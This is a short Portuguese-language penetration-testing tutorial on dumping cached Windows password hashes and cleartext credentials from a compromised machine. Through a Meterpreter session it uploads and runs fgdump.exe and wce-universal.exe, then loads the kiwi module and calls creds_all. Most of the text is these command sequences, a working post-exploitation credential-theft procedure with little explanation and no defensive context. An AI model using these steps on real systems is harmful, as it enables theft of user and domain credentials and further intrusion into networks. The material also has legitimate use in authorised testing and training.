Obtendo hashes e senhas em cache

Existem outras técnicas para obter senhas e hashes que é através do cache do windows. Para isso, vamos utilizar um arquivo chamado fgdump.exe que permite acessar informações que estão em cache no sistema. Ele fica localizado em /usr/share/windows-binaries/fgdump. Podemos fazer o upload desse arquivo para a máquina alvo e logo em seguida pegar a shell para executar o programa.

meterpreter > upload /usr/share/windows-binaries/fgdump/fgdump.exe c:
meterpreter > shell

C:\fgdump.exe

Será gerado dois arquivos chamados 127.0.0.1.cachedump e 127.0.0.1.pwdump. Se olharmos o conteúdo do primeiro arquivo e essa máquina pertencer em um domínio, irá aparecer hashes de usuários que não aparecem no outro arquivo.

No Kali Linux, existe um outro arquivo que já trás as senhas em texto claro, o arquivo é o wce-universal.exe e fica localizado em /usr/share/windows-resources/wce. Podemos fazer o upload desse arquivo e executar da seguinte forma.

meterpreter > upload /usr/share/windows-resources/wce/wce-universal.exe c:
c:\>wce-universal.exe -w

O metasploit também um módulo do kiwi que facilita esse processo.

meterpreter > load kiwi
meterpreter > creds_all